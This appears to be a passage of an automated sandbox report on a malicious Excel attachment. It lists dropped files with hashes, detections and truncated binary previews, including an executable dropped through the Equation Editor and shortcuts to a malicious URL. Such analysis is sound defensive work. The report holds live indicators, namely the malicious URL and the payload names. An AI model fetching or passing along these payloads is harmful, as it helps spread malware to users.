                    SHA-512:3CD70090E071E43B22A3638D8CDF13874C5DA34AFF2CB314E170FEDA59D630594314F45708797D83A47ED645A7F07755AC10F4A438858E6673CE560FE5F57975
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: Virustotal, Detection: 48%, Browse
                    Joe Sandbox View:
                    • Filename: RFQ#51281AOLAI.xls, Detection: malicious, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.f..............0..x............... ........@.. ....................................@....................................O...................................(m..T............................................ ............... ..H............text...$v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H...........LU......I...PZ.................................................}.....r...p}......}.....(.......(.....*...}.....r...p}......}.....(.......(.......}....*..0..............r...ps......o.....r...p...s.....s......s.........o....&..o.....o....}.....{.....{....o.............o....( ...&.......o!......*.........._b.. .......tw.......0............{....r...po".....{....r...po".....{....r...po".....{.....{.....%.o#.....o#.....{....r...po".....{....r...po".....{....r...po".....

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\15168997.emf

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):3193556
                    Entropy (8bit):4.049018355083669
                    Encrypted:false
                    SSDEEP:12288:711gPI5R32GnjPjIwcusrwvsWXKcnXfxpMZacUkRaN7Hjo1PWwVD8dt3iGnjPjIJ:7jgOR30wOSKx1OwVat3wwKuWh1Owb
                    MD5:762C6A27FE6DF812EE45907EB47438A3
                    SHA1:8C19872A02FAA2CFFC53414535B9FA33E639DE58
                    SHA-256:584EB121F00BB118B6E6E3E9E76CF9E6905701957A0FA671B1B90E97ADE5AEA9
                    SHA-512:36D581E65A3DBD470DFD868D09809AC175453B6F759663E90D61D38D38D45FDE3CC1572BDCE31E51D23A45438A0D4529295B5C6BCFD6416D971A0A5E662E4DA7
                    Malicious:false
                    Reputation:low
                    Preview:....l...........Q...r...........QN...a.. EMF.....0.f...'...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\530AFBE1.emf

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):3345824
                    Entropy (8bit):4.127125964869289
                    Encrypted:false
                    SSDEEP:12288:31SyEH5O3VGnjujIwQusOwvBWXKcnXfxpjZarUkeaNYHAo1KWwy1wAD8dt3iGnjs:3Iy6O3owCKCG15wy+Aat3wwKuWh1Owz
                    MD5:58E652C4B5EC5C5E39FD35E4173028E2
                    SHA1:527EAA579DABD37C966DE4E6774CFE6525C5639D
                    SHA-256:1A1BA95C0916EE7B8F6E82DC43A615CBF888B7A01BD74626E7F5B38AF3C50FCA
                    SHA-512:A1CF5189F885B5F50EC164C2A8F511379B49AD8229C042D7515745407CD72E69480895E3208E897B8EF56D732EED067A68197BAA953F12288F6CF08DC36A1FF3
                    Malicious:false
                    Preview:....l...........Q...............!?..3X.. EMF......3.....5...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'................3f.....%....................3f.....................................L...d...4...f...7...{...4...f...........!..............?...........?................................'.......................%...........(.......................L...d...............................$...!..............?...........?................................'...

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\82B65CF.emf

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):47668
                    Entropy (8bit):3.1596342065498937
                    Encrypted:false
                    SSDEEP:384:3U3D+b3D5w5Md8+8HigjlyI2bvIM6kbvBnMVGGSvUAEgGNTpy:3U36KMiBHiQIb5r6VGdMAL5
                    MD5:7234D51A16A22252EC6EBD2AA4D39032
                    SHA1:DD274936B3B5A73237E6CBD3FEC35DE2C5663CBF
                    SHA-256:4509768C6F338197CB0C65236CD9C56ADD865D78239EB6941E0029455793C7A5
                    SHA-512:5878997A67435A9AD0B87C4704E1E2457A8572C1FE44C36370BD0C6964AB9C5A6A580787D19A05BC0A1062FA926179319CFF99DAE2257FF59C47BDDB3C751D5B
                    Malicious:false
                    Preview:....l...........;...............~@..xW.. EMF....4...u.......................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................<.......%...........%.......................R...p................................@..T.i.m.e.s. .N.e.w. .R.o.m.a.n........................................................................|..H............,......,......,............. .E......,......,......,.....G................*..Ax...N..............T.i.m.e.s. .N.e.w. .R.o...F.....6...............P.,.................................................dv......%...........%...........%.......................T...T...........+...q........i.@...@....Z.......L...............<.......P... ...,...............T...T...,.......W...q........i.@...@,...Z.......L...............<.......P... ...,...............T...T...X...........q........i.@...@X...Z.......L...............<...

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A5FBA584.emf

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):3360728
                    Entropy (8bit):4.127289069725288
                    Encrypted:false
                    SSDEEP:12288:T1/uhO5r34GnjpjIwIustwvuWXKcnXfxpCZa+Uk3aNxHJo1dWwm1odD8dt3iGnjM:T9u2r3gwaamn1cwmCdat3wwKuWh1OwD
                    MD5:B573DD2F7DA05EA19E47A259EA26573B
                    SHA1:F7A05E69574CE7E4F9D1376BA3C1275C4CD992C6
                    SHA-256:AAF733355FD9795C136B24FBB818BB6BFD3E666DC5571506230D1641A8094059
                    SHA-512:1EFF25A65E8F72BEA0646E79F4E32610306982FAE767920E744E784C1EE1CFBBD081E83A2FC5275BFE11D8E3CFAAA545416CD38114EAAA09DF178089946EEA49
                    Malicious:false
                    Preview:....l...........{................D...`.. EMF.....G3.....5.......................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................#..."...........!...................................................#..."...........!...................................................#..."...........!...................................................#...'................3f.....%....................3f.....................................L...d.......R.......c.......R...........!..............?...........?................................'.......................%...........(.......................L...d...................................!..............?...........?................................'...

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9D5C678.doc

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Rich Text Format data, version 1
                    Category:dropped
                    Size (bytes):84055
                    Entropy (8bit):2.564253730925419
                    Encrypted:false
                    SSDEEP:384:kwiGEC30k0fWHuaN6oQeO3seC31xcxwV+k629/sYdhpfsl4ZnxP941:N1WWPNxssN31xcxc+kRsYdkl4Znr0
                    MD5:0A9C028203A8416BE8DB7371550D0FB5
                    SHA1:2F576CDFBF4F60918676F6583265C504BDEEFA21
                    SHA-256:A424C4312F97747EFA22A627AA0C77C4F11022D171E11D3EEFF00DD77B737520
                    SHA-512:51D92688ABEE365F550552C565EBC422000C6CDF6A0E58528922BDE4323906CD85D3DCF7D29FB52ADF9CDC4C59E3310704A25657B5A9683ED041087F7DB01B69
                    Malicious:true
                    Yara Hits:
                    • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9D5C678.doc, Author: ditekSHen
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    Preview:{\rtf1.............{\*\groupTop920443172 \(}.{\664116854/<`?2:.~57$-|-+],|2/?5$,;^?+!.8/.~]%...6^3/;8.4#[..?>):5@2=?0??97(+.6.#+`'5:);*(5??@7.;6?&4%:25[756?1?^].&[&&&+*>7-%1?8?%6$*!;|#?_20=/!~+'%?:?%[4']?/,|?`8(?_#/)1|>9%-```6.64;073*%%,$?3%</''@/_9'.?.4`_,#1$`>5#*?6<~<'?=;&%0&#?/.?*$?.&..7]#?.?~?%,?#8/'&):?.4$?77*4*^70?6?-..)^_`?9=:%`..|$+?]'0~]._1,;!.7.~??29`;:?<?_[^?5*@_0_6*,?>;.-?>10@|@*=*?!>,]`2,':**[3#7]?8>2$~@.1?,-%?7'.<&@+)|-'*!4!2&?72&=5]#/?`_|&,-)$@9_2$,&+)7`2>/.%<?#+&_`:3^/'1=2%-'7`%5%..99?6+%`+0.?>1$%8_%?%0[)()!.<%*?%&~-#.9??:&!-5~2#10]|?7('?~^[6.-'`$)=`%?97(9<5;-6?@~?.0[.00`%3+#4`8...48,>-?_.@.%>7[!~7?)86,)@*&/?7`!..-$%;21.>2&<-.%[5-/|&+:7@2!4+~`.[?=@'=+.(?,1/&!|.>1.&,5.'&|4:*3.|7.~+,,=*~@.[.36%/!.&(#&`..?8-1?*(_)_,8#]'=..!?_%?%?,9.4***?4[-5$$?6==,=''1~%*~.,25~;.=7`[<*].87/.?.;89[>.).|;?8^??5:^:0^*]07?9??*/+?<@6727:?_!>+?`-8%?'':)8`>-.-#7(/3)]??%@6%68<~)16!|:%|^?>4=4:[..;_?@'^>`#..1$?%/3^;.=`^.$><?^..]:+./7/7.<26$5=??*~19-|6|$?5/!(58,`?.6:)1_5)[|?/'-0::8?.9'52(:%~22+4))&3*

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B2025738-BC6B-4CB2-8D99-AAA2C3F993CF}.tmp

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Composite Document File V2 Document, Cannot read section info
                    Category:dropped
                    Size (bytes):15872
                    Entropy (8bit):5.725582137415335
                    Encrypted:false
                    SSDEEP:384:0Pp3BLuaiNLaJP43BLUSiNLaCP93BLUaiNLaCPg3BLUaiNLaCP43YLUaiNLa:wLk2+LS2SLO2dLO2cLO2
                    MD5:89C0EF5562DD42CF6D6B4892CF1DCF7E
                    SHA1:08A068722FD64611D61A48EFF434DFA9A2164F18
                    SHA-256:3D38E1D6672F89CF65B6603872E79B94BC9E4CE78E09F6A3129EA5FF7601C97E
                    SHA-512:38AC49A14901DDC77026955EB7E0871E30054BF322041F0EDA3025880611A257019541ADF75F26914FBFDE95422C43B2974BC5A4EA00493DD9450F25A9971B63
                    Malicious:true
                    Antivirus:
                    • Antivirus: Avira, Detection: 100%
                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3E517827-3883-40BB-A96D-4EA37FF0C91A}.tmp

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):1024
                    Entropy (8bit):0.05390218305374581
                    Encrypted:false
                    SSDEEP:3:ol3lYdn:4Wn
                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                    Malicious:false
                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8573D871-C657-4CC1-855A-1D36F00CBB91}.tmp

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):8704
                    Entropy (8bit):3.55451473025169
                    Encrypted:false
                    SSDEEP:192:QivRy8FTydoCB1GiavHhLKcgeUXWZpBIJzeDkkWSP4HZnq7O:D4cSd1DyHhrgL2PIJzakkF4HJIO
                    MD5:58C3F357D093C57D7306993C6C164293
                    SHA1:AAF467AC863B25E97FCCDEF90B22D9AD9F0F089D
                    SHA-256:83E355E06F0C99C6E63A5ADC5B1767DE41C4FA37361D1151D604E88587B2F244
                    SHA-512:4E11295B325224D0AE6464A46D5BCEA9F0E33C408C2DCC1B14E2B42F9FBA2D8EE2AC4D8ECF61353BB8E51B300E3C13F6620CB45E249F23FEECFFC2B40FF8E395
                    Malicious:false
                    Preview:..................6.4.1.1.6.8.5.4./.<.`.?.2.:...~.5.7.$.-.|.-.+.].,.|.2./.?.5.$.,.;.^.?.+.!...8./...~.].%.......6.^.3./.;.8...4.#.[.....?.>.).:.5.@.2.=.?.0.?.?.9.7.(.+...6...#.+.`.'.5.:.).;.*.(.5.?.?.@.7...;.6.?.&.4.%.:.2.5.[.7.5.6.?.1.?.^.]...&.[.&.&.&.+.*.>.7.-.%.1.?.8.?.%.6.$.*.!.;.|.#.?._.2.0.=./.!.~.+.'.%.?.:.?.%.[.4.'.].?./.,.|.?.`.8.(.?._.#./.).1.|.>.9.%.-.`.`.`.6...6.4.;.0.7.3.*.%.%.,.$.?.3.%.<./.'.'.@./._.9.'...?...4.`._.,.#.1.$.`.>.5.#.*.?.6.<.~.<.'.?.=.;.&.%.0.&.#.?./...?.*.$.?...&.....7.].#.?...?.~.?.%.,.?.#.8./.'.&.).:.?...4.$.?.7.7.*.4.*.^.7.0.?.6.?.-.....).^._.`.?.9.=.:.%.`.....|.$.+.?.].'.0.~.]..._.1.,.;.!...7...~.?.?.2.9.`.;.:.?.<.?._.[.^.?.5.*.@._.0._.6.*.,.?.>.;...-.?.>.1.0.@.|.@.*.=.*.?.!.>.,.].`.2.,.'.:.*.*.[.3.#.7.].?.8.>.2.$.~.@...1.?.,.-.%.?.7.'...<.&.@.+.).|.-.'.*.!.4.!.2.&.?.7.2.&.=.5.].#./.?.`._.|.&.,.-.).$.@.9._.2.$.,.&.+.).7.`.2.>./...%.<.?.#.+.&._.`.:.3.^./.'.1.=.2.%.-.'.7.`.%.5.%.....9.9.?.6.+.%.`.+.0...?.>.1.$.%.8._.%.?.%.0.[.).(.).!...<.%.*.?.%.&.~.-.#.

                    C:\Users\user\AppData\Local\Temp\{349E3D71-D20F-45D1-9505-9B6567CC2C56}

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):131072
                    Entropy (8bit):0.025498425711638555
                    Encrypted:false
                    SSDEEP:6:I3DPcPvdRvxggLRrXmgK+nGRXv//4tfnRujlw//+GtluJ/eRuj:I3DPY7fjnOvYg3J/
                    MD5:5D192931B5FA5DDC1E40C5AC932583FF
                    SHA1:1FD6CDD0EEF63B786B1AF228B7C6A1F3E9593322
                    SHA-256:AC6ECD4AC7DA79BD75494A2C389733BA806F9231EE6E59F6885254197E1BEB72
                    SHA-512:9331850193418E1A0D6F901BF0EDA80B29FF0F6B561DF48E46649470EFB9EAFB874CBA9FC2A199795487951605BED54457B62E6DA11161FFB9316D27C89BF96A
                    Malicious:false
                    Preview:......M.eFy...zH.8Q.D...lf..%S,...X.F...Fa.q................................`.{I......}........M..[..O..+t.........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\{56537DEB-CC8B-45B6-8457-FF0079CD0DC5}

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):131072
                    Entropy (8bit):0.025538895507565103
                    Encrypted:false
                    SSDEEP:6:I3DPcQrAPFvxggLRDSJXEairtRXv//4tfnRujlw//+GtluJ/eRuj:I3DPYPpuEaITvYg3J/
                    MD5:FE0601994EF97D876EDDAC6E461986B4
                    SHA1:0A64E0533D424530A70F3CAF9306F92E81AD3091
                    SHA-256:41C4AD17757703B6E5AC882A5539744BEC78AB94C8AD811160CEAF7418509097
                    SHA-512:F69CB62EC7AB0A565EE9B45E1E06F2658D9D147A079241D5E29812D4216142A96E05477AB44CD09BB0C7A5B9081F7E2972E5E1D4ACBF663509DF449B461DC027
                    Malicious:false
                    Preview:......M.eFy...z9...5..L.R..V.%.S,...X.F...Fa.q.............................[kT.N.A.q...2v.........v..q..O.G.(...2.....................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\~DF22DDBDAC750EB3B2.TMP

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):512
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3::
                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                    Malicious:false
                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\~DF2F5EA4D2F53E3BDB.TMP

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):577536
                    Entropy (8bit):7.85777216024191
                    Encrypted:false
                    SSDEEP:12288:wlQfeWxJ3P++kns9xbEHQs57JDxmIHjvW4pM:1ZwsLEh7JvrW42
                    MD5:7B38C4682DF1DAA813F2883A39708F0F
                    SHA1:B383F687D605EBD9D8CA3B62CBD987594BF4E8FB
                    SHA-256:85B6887E233A2391D52A6F40CEDE95DFE379DFD5E09A60C7E84A01FF57AF4F56
                    SHA-512:A065BB959C3C358C3D3F6DF23FD7B778A3D21B98673E28486678EA07D5525037924A826A7025C8B67187D28FCA0D13AAB88862BCDB356FEFD2D11CB07E20DBED
                    Malicious:false
                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Local\Temp\~DFA1D41AEDA01093E0.TMP

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Composite Document File V2 Document, Cannot read section info
                    Category:dropped
                    Size (bytes):568320
                    Entropy (8bit):7.929271836505916
                    Encrypted:false
                    SSDEEP:12288:ilQfeWxJ3P++kns9xbEHQs57JDxmIHjvW4pM:PZwsLEh7JvrW42
                    MD5:6831AAC012546D93752EF1D8C5340478
                    SHA1:259C8AAE18C5A35E95123751066476AE4F4AF6F5
                    SHA-256:31221BC0D716B7DF5CFE81585D2CA7769FC48311AFEAD4F72CBEB811CF0E81E7
                    SHA-512:CDB42C4192C99A607D63F304EDD3F471B3E241D34B9E5DFA1B0F64AA8BB2ACCC2D79FF430F11FFE9942D331EE4325C8E90B6BBF409F94B59364E22EB20BDE0DD
                    Malicious:false
                    Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                    C:\Users\user\AppData\Local\Temp\~DFA463212C88F5C508.TMP

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):512
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3::
                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                    Malicious:false
                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\dGa.url

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:MS Windows 95 Internet shortcut text (URL=<http://tny.wtf/dGa>), ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):44
                    Entropy (8bit):4.470573095811685
                    Encrypted:false
                    SSDEEP:3:HRAbABGQYm/3LcmWdovn:HRYFVm/3LOdyn
                    MD5:0FFF39E1FDCD78B0E6A988670CBFAB2C
                    SHA1:9206238017EA564C8332D48A4AEA14F555ACA73E
                    SHA-256:6EAEA2BF73B0E93543F442CA1AC65D1621D96E770DCC89C22089CCFCBD6E02D8
                    SHA-512:A3C6116FA93D2F340500180FFE065254F9CCFB5A87E24715C37F301451C7749C550C52FE9FBEFC29EFCEA722B7EE3920D3578A4D3705CC6C5AB57D24BB998C91
                    Malicious:true
                    Preview:[InternetShortcut]..URL=http://tny.wtf/dGa..

                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:Generic INItialization configuration [xls]
                    Category:modified
                    Size (bytes):88
                    Entropy (8bit):4.9664307324412285
                    Encrypted:false
                    SSDEEP:3:bDc7SIcLOQBGK5mM7/BGK5v:bQOhDBGazBGS
                    MD5:963168A7D6EE229C565540108AD3D53A
                    SHA1:689D839FE5A0A91D76721FAD78A1A2AD329F14C7
                    SHA-256:6434A3C4C2BB4ED907E267695CE40752FF7C0BA161D698735AD9418426C429AA
                    SHA-512:5A11866EAB7F507EDABD9EB53874805058F5E5462F195B05D914D042A04CEE1B12BDDE0A6278FBE04E4F0BF6D0319805DD13710ACC4AFCF2ACCAF5D01CFA14D6
                    Malicious:false
                    Preview:[folders]..dGa.url=0..tny.wtf.url=0..RFQ#51281AOLAI.LNK=0..[xls]..RFQ#51281AOLAI.LNK=0..

                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\tny.wtf.url

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:MS Windows 95 Internet shortcut text (URL=<http://tny.wtf/>), ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):41
                    Entropy (8bit):4.2963379801223045
                    Encrypted:false
                    SSDEEP:3:HRAbABGQYm/3LcmWy:HRYFVm/3LOy
                    MD5:D591A53347F94FBC48B4B6A5CCE920ED
                    SHA1:C00082566F3211F9B1BBEC933A8AE164759C290A
                    SHA-256:1CA93696A94797C9411318830CAC6A5B26FEACC37D5CAA4B3742D722CD073781
                    SHA-512:BA14258049ABCC3E31AA3DFC3ABBC2949AF30BB73B031C0E408BCF036B51B7AC11E32C3B39A7952E1A007179720C970B29CB2DF8EF03A021EF3B59FEB5AE177E
                    Malicious:true
                    Preview:[InternetShortcut]..URL=http://tny.wtf/..

                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):162
                    Entropy (8bit):2.503835550707525
                    Encrypted:false
                    SSDEEP:3:vrJlaCkWtVypil69oycWjUbtFJlln:vdsCkWtTl69oyjUvl
                    MD5:CB3D0F9D3F7204AF5670A294AB575B37
                    SHA1:5E792DFBAD5EDA9305FCF8F671F385130BB967D8
                    SHA-256:45968B9F50A9B4183FBF4987A106AB52EB3EF3279B2118F9AB01BA837DC3968A
                    SHA-512:BD116CAF3ACA40A5B90168A022C84923DB51630FA0E62E46020B71B8EB9613EAE776D476B0C6DE0D5F15642A74ED857765150F406937FBA5CB995E9FCDAC81AE
                    Malicious:false
                    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                    C:\Users\user\AppData\Roaming\winiti.exe

                    Download File
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):951296
                    Entropy (8bit):7.752827643333699
                    Encrypted:false
                    SSDEEP:24576:yXRv6h6aYfy8hbsv4IFlwLa15cAJAiV8KObLDCmCeBaOmXi:4JpTw8kJH8hCmvAOGi
                    MD5:1F5C95D40C06C01300F0A6592945A72D
                    SHA1:79A217ED19833EFCF640FFD8BB04803E9F30D6F4
                    SHA-256:434EC59B680788BAE7F2935200A77E681CECBB517D853C6E6CF31F4CF112E5CC
                    SHA-512:3CD70090E071E43B22A3638D8CDF13874C5DA34AFF2CB314E170FEDA59D630594314F45708797D83A47ED645A7F07755AC10F4A438858E6673CE560FE5F57975
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Joe Sandbox View:
                    • Filename: RFQ#51281AOLAI.xls, Detection: malicious, Browse
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.f..............0..x............... ........@.. ....................................@....................................O...................................(m..T............................................ ............... ..H............text...$v... ...x.................. ..`.rsrc................z..............@..@.reloc..............................@..B........................H...........LU......I...PZ.................................................}.....r...p}......}.....(.......(.....*...}.....r...p}......}.....(.......(.......}....*..0..............r...ps......o.....r...p...s.....s......s.........o....&..o.....o....}.....{.....{....o.............o....( ...&.......o!......*.........._b.. .......tw.......0............{....r...po".....{....r...po".....{....r...po".....{.....{.....%.o#.....o#.....{....r...po".....{....r...po".....{....r...po".....

                    C:\Users\user\Desktop\45930000

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 11:43:22 2024, Security: 1
                    Category:dropped
                    Size (bytes):1140736
                    Entropy (8bit):7.982269014730064
                    Encrypted:false
                    SSDEEP:24576:8ZwsLEh7JvrW422NDL2bJaLffYFR4ZGaJT4a6XxmjgID:8ysK7VW422hGkyaJToXxmr
                    MD5:B8A8570647D3B33521F18F356FAEF1AD
                    SHA1:CB1E33D16F4384BCCE3F650C2F531C901D130414
                    SHA-256:0417419921C78EB4A44383E71235C72BE8592C8A8CDD84F1163AF57C8A812A68
                    SHA-512:F325688B05CB9E164A0CD6578F92B4C86C3787D9C8663F3BBB518C1A9D525AD9567BDE78BAE4648CF786C8837AA05207E17C9BBD1B41484EBE5E63371545F92C
                    Malicious:false
                    Preview:......................>...................................D...................................................f.......h.......j.......l.......n........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                    C:\Users\user\Desktop\45930000:Zone.Identifier

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:ASCII text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:false
                    Preview:[ZoneTransfer]....ZoneId=0

                    C:\Users\user\Desktop\RFQ#51281AOLAI.xls (copy)

                    Download File
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 11:43:22 2024, Security: 1
                    Category:dropped
                    Size (bytes):1140736
                    Entropy (8bit):7.982269014730064
                    Encrypted:false
                    SSDEEP:24576:8ZwsLEh7JvrW422NDL2bJaLffYFR4ZGaJT4a6XxmjgID:8ysK7VW422hGkyaJToXxmr
                    MD5:B8A8570647D3B33521F18F356FAEF1AD
